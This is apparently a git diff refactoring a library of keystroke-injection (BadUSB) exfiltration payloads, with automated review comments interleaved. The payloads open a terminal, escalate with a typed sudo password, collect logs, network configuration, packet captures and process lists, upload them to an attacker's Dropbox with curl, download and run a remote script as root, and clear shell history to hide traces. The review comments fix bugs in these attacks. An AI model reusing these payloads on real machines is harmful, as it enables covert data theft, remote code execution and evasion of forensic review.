+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
REM Open Windows research
-DELAY 2000
GUI
DELAY 1000
REM Search and opern explorer app
-STRING explorer
-ENTER
+STRINGLN explorer
DELAY 1000
REM Goto search bar and open "Uninstall or change a program" page
diff --git a/payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/payload.txt b/payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/payload.txt
index 63282c8a4..d7c5910bd 100644
--- a/payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/payload.txt
+++ b/payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/payload.txt
@@ -1,18 +1,18 @@
-REM ########################################################
-REM # #
-REM # Title : Dump Windows Memory Through ProcDump #
-REM # Author : Aleff #
-REM # Version : 1.0 #
-REM # Category : Exfiltration #
-REM # Target : Windows #
-REM # #
-REM ########################################################
-
+REM_BLOCK
+########################################################
+# #
+# Title : Dump Windows Memory Through ProcDump #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration #
+# Target : Windows #
+# #
+########################################################
+END_REM
REM Requirements:
REM - Authorization to execute powershell commands
-
REM You must change it to 'procdump' if you want to use procdump.exe instead of procdump64a.exe
DEFINE #WHAT_EXE_DO_YOU_WANT_TO_USE procdump64a
diff --git a/payloads/library/exfiltration/Exfiltrate Computer Screenshots/payload.txt b/payloads/library/exfiltration/Exfiltrate Computer Screenshots/payload.txt
index 05ee6f0e2..6f6e6f63c 100644
--- a/payloads/library/exfiltration/Exfiltrate Computer Screenshots/payload.txt
+++ b/payloads/library/exfiltration/Exfiltrate Computer Screenshots/payload.txt
@@ -1,13 +1,12 @@
-REM ###################################################
-REM # |
-REM # Title : Exfiltrate Computer Screenshots |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltrate |
-REM # Target : Windows 10-11 |
-REM # |
-REM ###################################################
-
+###################################################
+# #
+# Title : Exfiltrate Computer Screenshots #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltrate #
+# Target : Windows 10-11 #
+# #
+###################################################
REM Requirements:
REM - Internet Connection
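Review bot: The banner in this hunk lost its `REM` prefixes but, unlike the other payload banners visible in this diff, was not wrapped in `REM_BLOCK` … `END_REM`, so the nine `#` lines are no longer marked as comments. Add `REM_BLOCK` on the line before the first `####` row and `END_REM` on the line after the last one, as done in the other files. I have not checked how the compiler treats a bare `#` line, but the header should at least match the rest of the library.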
@@ -15,12 +14,53 @@ REM - Discord Webhook (or whatever you want for the exfiltration)
REM - ExecutionPolicy Bypass
REM - Python
-
REM REQUIRED - Set your Python script link
DEFINE SCRIPT-PY-LINK example.com
-DELAY 1000
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
+
GUI r
DELAY 1000
STRING powershell
diff --git a/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/README.md b/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/README.md
index 8f44f1c6f..19cec2ebb 100644
--- a/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/README.md
+++ b/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/README.md
@@ -1,11 +1,9 @@
-# Exfiltrate Linux Content With Dropbox - BADUSB ✅
+# Exfiltrate Linux Content With Dropbox
A script used to take folder content on Linux Systems.
**Category**: Exfiltration, Execution
-[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
-
## Description
A script used to take folder content on Linux Systems.
diff --git a/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md
index 346d51de4..77df4831b 100644
--- a/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md
+++ b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md
@@ -1,12 +1,10 @@
-# Exfiltrate Linux Log Files - BADUSB ✅
+# Exfiltrate Linux Log Files
A script used to take linux logs.
**Category**: Exfiltration, Execution
-[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
-
## Description
A script used to take linux logs.
diff --git a/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt
index dbd546f65..721e08cd6 100644
--- a/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt
+++ b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt
@@ -1,80 +1,93 @@
-REM ######################################################
-REM # |
-REM # Title : Exfiltrate Linux Logs With Dropbox |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration, Execution |
-REM # Target : Linux |
-REM # |
-REM ######################################################
+REM_BLOCK
+######################################################
+# #
+# Title : Exfiltrate Linux Logs With Dropbox #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration, Execution #
+# Target : Linux #
+# #
+######################################################
+END_REM
REM Requirements:
REM - Internet Connection
REM - Dropbox Account
REM - - DROPBOX_ACCESS_TOKEN
+REM Required: Set here your Dropbox access TOKEN
+DEFINE #TOKEN example
-DELAY 1000
-CTRL-ALT t
+REM Send to Dropbox function
+DEFINE #DROPBOX_API_LINK https://content.dropboxapi.com/2/files/upload
+
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
-REM Required: Set here your Dropbox access TOKEN
+CTRL-ALT t
DELAY 2000
-DEFINE TOKEN example
-STRING ACCESS_TOKEN="
-STRING TOKEN
-STRING "
-ENTER
-
+STRINGLN ACCESS_TOKEN="#TOKEN"
DELAY 500
-STRING USER_NAME=$(whoami)
-ENTER
+STRINGLN USER_NAME=$(whoami)
REM Create random num
DELAY 500
-STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
-ENTER
+STRINGLN RANDOM=$(shuf -i 1-999999999999 -n 1)
REM Folder path
DELAY 500
-STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/tmp/" prefix-XXXXXXXXXX)
-ENTER
+STRINGLN TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/tmp/" prefix-XXXXXXXXXX)
REM Zip path
DELAY 500
-STRING ZIP_NAME="$RANDOM.zip"
-ENTER
+STRINGLN ZIP_NAME="$RANDOM.zip"
DELAY 500
-STRING ZIP_PATH="$TMP_FOLDER_PATH/$ZIP_NAME"
-ENTER
+STRINGLN ZIP_PATH="$TMP_FOLDER_PATH/$ZIP_NAME"
REM Default log path
DELAY 500
-STRING LOG_PATH="/var/log/"
-ENTER
+STRINGLN LOG_PATH="/var/log/"
DELAY 500
-STRING zip -r "$ZIP_PATH" "$LOG_PATH"
-ENTER
+STRINGLN zip -r "$ZIP_PATH" "$LOG_PATH"
REM Delay of zipping operation - it depends
DELAY 10000
DELAY 500
-STRING DROPBOX_FOLDER="/$ZIP_NAME"
-ENTER
+STRINGLN DROPBOX_FOLDER="/$ZIP_NAME"
-REM Send to Dropbox function
-DEFINE DROPBOX_API_LINK https://content.dropboxapi.com/2/files/upload
DELAY 500
-STRING curl -X POST
-STRING DROPBOX_API_LINK
-STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
-ENTER
+STRINGLN curl -X POST #DROPBOX_API_LINK --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
REM Send timing - it depends
DELAY 5000
DELAY 500
-STRING rm -rf "$TMP_FOLDER_PATH"
-ENTER
+STRINGLN rm -rf "$TMP_FOLDER_PATH"
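Review bot: `STRINGLN RANDOM=$(shuf -i 1-999999999999 -n 1)` assigns to `RANDOM`, which bash treats specially: the assignment only seeds the generator, and each later `$RANDOM` expands to a fresh value between 0 and 32767. `ZIP_NAME="$RANDOM.zip"` therefore does not contain the number produced by `shuf`, and the comment `REM Create random num` describes something the typed command does not do. Use an ordinary variable name, e.g. `STRINGLN RAND_ID=$(shuf -i 1-999999999999 -n 1)` and `STRINGLN ZIP_NAME="$RAND_ID.zip"`. This assumes the terminal opened by `CTRL-ALT t` runs bash; the line predates this commit and was only converted to `STRINGLN` here.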
diff --git a/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md
index 56817acb7..542ee4455 100644
--- a/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md
+++ b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md
@@ -1,5 +1,5 @@
-# Exfiltrate Network Configuration - Linux ✅
+# Exfiltrate Network Configuration - Linux
A script used to exfiltrate the network configuration on a Linux machine.
diff --git a/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt
index 91230a996..932483b5c 100644
--- a/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt
+++ b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt
@@ -1,96 +1,101 @@
-
-REM ##########################################################
-REM # |
-REM # Title : Exfiltrate Linux Network Configuration |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration, Execution |
-REM # Target : Linux |
-REM # |
-REM ##########################################################
+REM_BLOCK
+##########################################################
+# #
+# Title : Exfiltrate Linux Network Configuration #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration, Execution #
+# Target : Linux #
+# #
+##########################################################
+END_REM
REM Requirements:
REM - Internet Connection
REM - Dropbox Account
REM - - DROPBOX_ACCESS_TOKEN
-DELAY 1000
-CTRL-ALT t
+REM Required: Set here your Dropbox access TOKEN
+DEFINE #TOKEN example
+REM Set yout Dropbox folder name
+DEFINE #DROPBOX_FOLDER_NAME example
+
+REM This is just a Dropbox const, don't edit
+DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
+
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
+
+CTRL-ALT t
DELAY 2000
-REM Required: Set here your Dropbox access TOKEN
-DEFINE TOKEN example
-STRING ACCESS_TOKEN="
-STRING TOKEN
-STRING "
-ENTER
+STRINGLN ACCESS_TOKEN="#TOKEN"
-REM DELAY 500
-REM STRING USER_NAME=$(whoami)
-REM ENTER
+DELAY 500
+STRINGLN USER_NAME=$(whoami)
DELAY 500
-STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
-ENTER
+STRINGLN RANDOM=$(shuf -i 1-999999999999 -n 1)
DELAY 500
-STRING ZIP_NAME="$RANDOM.zip"
-ENTER
+STRINGLN ZIP_NAME="$RANDOM.zip"
DELAY 500
-STRING ZIP_PATH="/home/$USER_NAME/Documents/$ZIP_NAME"
-ENTER
+STRINGLN ZIP_PATH="/home/$USER_NAME/Documents/$ZIP_NAME"
REM Folder path
DELAY 500
-STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/Documents" prefix-XXXXXXXXXX)
-ENTER
+STRINGLN TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/Documents" prefix-XXXXXXXXXX)
DELAY 500
-STRING nmcli > "$TMP_FOLDER_PATH/nmcli.txt"
-ENTER
+STRINGLN nmcli > "$TMP_FOLDER_PATH/nmcli.txt"
DELAY 1000
-STRING nmcli connection show > "$TMP_FOLDER_PATH/nmcli_connection.txt"
-ENTER
+STRINGLN nmcli connection show > "$TMP_FOLDER_PATH/nmcli_connection.txt"
DELAY 1000
-STRING nmcli device show > "$TMP_FOLDER_PATH/nmcli_device.txt"
-ENTER
+STRINGLN nmcli device show > "$TMP_FOLDER_PATH/nmcli_device.txt"
DELAY 1000
REM Delay for zipping operation, it depends by computer power and folder directory
STRING zip -r "$ZIP_PATH" "$TMP_FOLDER_PATH"
DELAY 3000
-
-REM Set yout Dropbox folder name
-DEFINE DROPBOX_FOLDER_NAME example
-STRING DROPBOX_FOLDER="/
-ENTER
-STRING DROPBOX_FOLDER_NAME
-ENTER
-STRING "
-ENTER
+STRINGLN DROPBOX_FOLDER="/#DROPBOX_FOLDER_NAME"
DELAY 500
-DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
-STRING curl -X POST
-STRING DROPBOX_API_CONST
-STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
-ENTER
-DELAY 2000
-STRING history -c
-ENTER
+STRINGLN curl -X POST#DROPBOX_API_CONST --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
-DELAY 500
-STRING rm -rf "$TMP_FOLDER_PATH"
-ENTER
+DELAY 2000
+STRINGLN history -c
DELAY 500
-STRING rm -rf "$ZIP_PATH"
-ENTER
+STRINGLN rm -rf "$TMP_FOLDER_PATH"
DELAY 500
-STRING exit
-ENTER
\ No newline at end of file
+STRINGLN rm -rf "$ZIP_PATH"; exit
\ No newline at end of file
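Review bot: The Requirements block and the constants at the top of the new file disagree, and the comments do not say where the token ends up. The REM lines still name `DROPBOX_ACCESS_TOKEN` while the added constant is `#TOKEN`. `STRINGLN ACCESS_TOKEN="#TOKEN"` and the curl line that follows put that token in the target's terminal and on curl's command line, where it stays readable to anyone reviewing the host (scrollback, process arguments, command auditing). I would document both in one line: `REM - - #TOKEN (typed in clear on the target; scope it to one folder and revoke it after the test)`. The relocated comment also has a typo and should read `REM Set your Dropbox folder name`.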
diff --git a/payloads/library/exfiltration/ExfiltrateNetworkTraffic_Linux/payload.txt b/payloads/library/exfiltration/ExfiltrateNetworkTraffic_Linux/payload.txt
index 510492331..04209f128 100644
--- a/payloads/library/exfiltration/ExfiltrateNetworkTraffic_Linux/payload.txt
+++ b/payloads/library/exfiltration/ExfiltrateNetworkTraffic_Linux/payload.txt
@@ -1,57 +1,76 @@
-
-REM #############################################
-REM # |
-REM # Title : Exfiltrate Network Traffic |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration |
-REM # Target : Linux |
-REM # |
-REM #############################################
+REM_BLOCK
+#############################################
+# #
+# Title : Exfiltrate Network Traffic #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration #
+# Target : Linux #
+# #
+#############################################
+END_REM
REM Requirements:
REM - Permissions
REM - Internet Connection
REM REQUIRED: You need to know the sudo password and replace 'example' with this
-DEFINE SUDO_PASS example
+DEFINE #SUDO_PASS example
+
REM REQUIRED: Set what you want to sniff, for example tcp port 80
-DEFINE SNIFFING example
+DEFINE #SNIFFING example
+
REM Set your Dropbox link or whatever you want to use to exfiltrate the sniff file
-DEFINE TOKEN example
+DEFINE #TOKEN example
+
REM Just a Dropbox const
-DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
-REM Output file path packets.pcap, remember to use pcap extension
-DEFINE FILE example.pcap
+DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
+REM Output file path packets.pcap, remember to use pcap extension
+DEFINE #FILE example.pcap
+
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
-DELAY 1000
CTRL-ALT t
DELAY 2000
-
REM #### PERMISSIONS SECTION ####
-
-
STRINGLN sudo su
DELAY 1000
-STRINGLN SUDO_PASS
+STRINGLN #SUDO_PASS
DELAY 1000
-
REM #### Network Traffic SECTION ####
-
-
-STRING FILE_PATH="
-STRING FILE
-STRING "
-ENTER
+STRINGLN FILE_PATH="#FILE"
DELAY 500
-STRING filter_expression="
-STRING SNIFFING
-STRING "
-ENTER
+STRINGLN filter_expression="#SNIFFING"
DELAY 500
REM Network card name
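Review bot: `STRINGLN #SUDO_PASS` is typed a fixed 1000 ms after `STRINGLN sudo su`, with nothing confirming that a password prompt has focus. When the prompt is not there, the line is entered as an ordinary command, so the privileged password is echoed in the terminal and can land in shell history and command-audit records. The REM above `DEFINE #SUDO_PASS` should say so, for example `REM NOTE: typed blind; treat the password as disclosed on the host and change it after the test`. The same pair appears in ExfiltratePhotosThroughShell (`STRINGLN sudo su` / `STRINGLN #SUDO-PSWD`). The payload body continues past this hunk.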
@@ -71,28 +90,18 @@ DELAY 60000
REM Kill the process by PID
STRINGLN kill $tcpdump_pid
-
REM #### Exfiltrate SECTION ####
REM You can use whatever you want, i use Dropbox
-STRING ACCESS_TOKEN="
-STRING TOKEN
-STRING "
-ENTER
+STRINGLN ACCESS_TOKEN="#TOKEN"
DELAY 500
STRINGLN DROPBOX_FOLDER="/Exfiltration"
DELAY 500
-STRING curl -X POST
-STRING DROPBOX_API_CONST
-STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$FILE_PATH"
-ENTER
-
+STRINGLN curl -X POST#DROPBOX_API_CONST--header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$FILE_PATH"
REM #### REMOVE TRACES ####
-
-
STRINGLN rm "$FILE_PATH"
DELAY 500
diff --git a/payloads/library/exfiltration/ExfiltratePhotosThroughShell/payload.txt b/payloads/library/exfiltration/ExfiltratePhotosThroughShell/payload.txt
index 8a26d4394..c0314dfd6 100644
--- a/payloads/library/exfiltration/ExfiltratePhotosThroughShell/payload.txt
+++ b/payloads/library/exfiltration/ExfiltratePhotosThroughShell/payload.txt
@@ -1,13 +1,14 @@
-
-REM ##################################################
-REM # |
-REM # Title : Exfiltrate Photos Through Shell |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration |
-REM # Target : Linux |
-REM # |
-REM ##################################################
+REM_BLOCK
+##################################################
+# #
+# Title : Exfiltrate Photos Through Shell #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration #
+# Target : Linux #
+# #
+##################################################
+END_REM
REM Requirements:
REM - Internet Connection
@@ -17,49 +18,63 @@ REM - if you need to install 'fswebcam'
REM - for add the -x permission to the script.sh downloaded
REM REQUIRED - replace example.com with your script.sh link
-DEFINE SCRIPT-SH-LINK example.com
+DEFINE #SCRIPT-SH-LINK example.com
REM REQUIRED - sudo Password
-DEFINE SUDO-PSWD example
+DEFINE #SUDO-PSWD example
+
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
-DELAY 1000
CTRL-ALT t
DELAY 2000
-
REM #### Permission ####
-
REM This section of sudo time depends by the computer power on which it runs.
REM So if you know that the computer on which you run the payload is too slow, increase it by a few seconds, otherwise you can try running it as it is set now or smaller depending on your needs.
-STRING sudo su
-ENTER
+STRINGLN sudo su
DELAY 500
-STRING SUDO-PSWD
-ENTER
+STRINGLN #SUDO-PSWD
REM DELAY Based On Computer Power
DELAY 5000
REM If you want to install the dependency of fswebcam you should decommend it.
-REM STRING apt install fswebcam -y
-REM ENTER
+REM STRINGLN apt install fswebcam -y
REM DELAY Based On Internet Power
REM DELAY 5000
-
REM #### Script ####
-
-
-STRING curl
-STRING SCRIPT-SH-LINK
-STRING > script.sh
-ENTER
+STRINGLN curl #SCRIPT-SH-LINK > script.sh
REM DELAY Based On Internet Power
DELAY 4000
-STRING chmod +x script.sh
-ENTER
+STRINGLN chmod +x script.sh
DELAY 500
-STRING nohup ./script.sh > /dev/null 2>&1 & exit
-ENTER
+STRINGLN nohup ./script.sh > /dev/null 2>&1 & exit
\ No newline at end of file
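Review bot: `STRINGLN curl #SCRIPT-SH-LINK > script.sh` runs inside the root shell opened by `sudo su`, and the file is then made executable and started with no check on what was actually downloaded. The placeholder `example.com` carries no scheme, and curl falls back to plain HTTP for such a URL, so the content executed as root depends on whoever answers that request. Pinning the transport and the content would close that gap: `STRINGLN curl --fail --proto '=https' #SCRIPT-SH-LINK > script.sh` followed by `STRINGLN echo "<expected-sha256>  script.sh" | sha256sum -c - || rm -f script.sh`, with the DEFINE holding a full `https://` URL. The `irm #PAYLOAD | iex` lines in ExfiltrateProcessInfo_Windows and ProtonVPN-config fetch and run remote code with the same gap.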
diff --git a/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt b/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt
index bdea2510f..3a3ccae9e 100644
--- a/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt
+++ b/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt
@@ -1,73 +1,79 @@
-
-REM ##########################################
-REM # |
-REM # Title : Exfiltrate Process Info |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration |
-REM # Target : Linux |
-REM # |
-REM ##########################################
+REM_BLOCK
+##########################################
+# #
+# Title : Exfiltrate Process Info #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration #
+# Target : Linux #
+# #
+##########################################
+END_REM
REM Requirements:
REM - Internet Connection
REM - Discord Webhook
-DELAY 1000
+REM Set yout Dropbox folder name
+DEFINE #DROPBOX_FOLDER_NAME example
+
+REM This is just a Dropbox const, don't edit
+DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
+
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
+
CTRL-ALT t
DELAY 2000
-
REM #### GET PROCESS SECTION ####
-
-
-STRING ps aux > process.txt
-ENTER
+STRINGLN ps aux > process.txt
DELAY 500
-
REM #### EXFILTRATE SECTION ####
-
-
REM Required: Set here your Dropbox access TOKEN
DEFINE TOKEN example
-STRING ACCESS_TOKEN="
-STRING TOKEN
-STRING "
-ENTER
+STRINGLN ACCESS_TOKEN="#TOKEN"
DELAY 500
-STRING USER_NAME=$(whoami)
-ENTER
+STRINGLN USER_NAME=$(whoami)
DELAY 500
-STRING TXT_PATH="/home/$USER_NAME/process.txt"
-ENTER
+STRINGLN TXT_PATH="/home/$USER_NAME/process.txt"
DELAY 500
-REM Set yout Dropbox folder name
-DEFINE DROPBOX_FOLDER_NAME example
-STRING DROPBOX_FOLDER="/
-STRING DROPBOX_FOLDER_NAME
-STRING "
-ENTER
+STRINGLN DROPBOX_FOLDER="/#DROPBOX_FOLDER_NAME"
DELAY 500
-DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
-STRING curl -X POST
-STRING DROPBOX_API_CONST
-STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$TXT_PATH"
-ENTER
+STRINGLN curl -X POST#DROPBOX_API_CONST --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$TXT_PATH"
REM It depends by the internet connection, btw 1 or 2 seconds, generally, is sufficient
DELAY 2000
-
REM #### REMOVE TRACES ####
-
-
-STRING history -c
-ENTER
-DELAY 500
-STRING exit
-ENTER
+STRINGLN history -c; exit
\ No newline at end of file
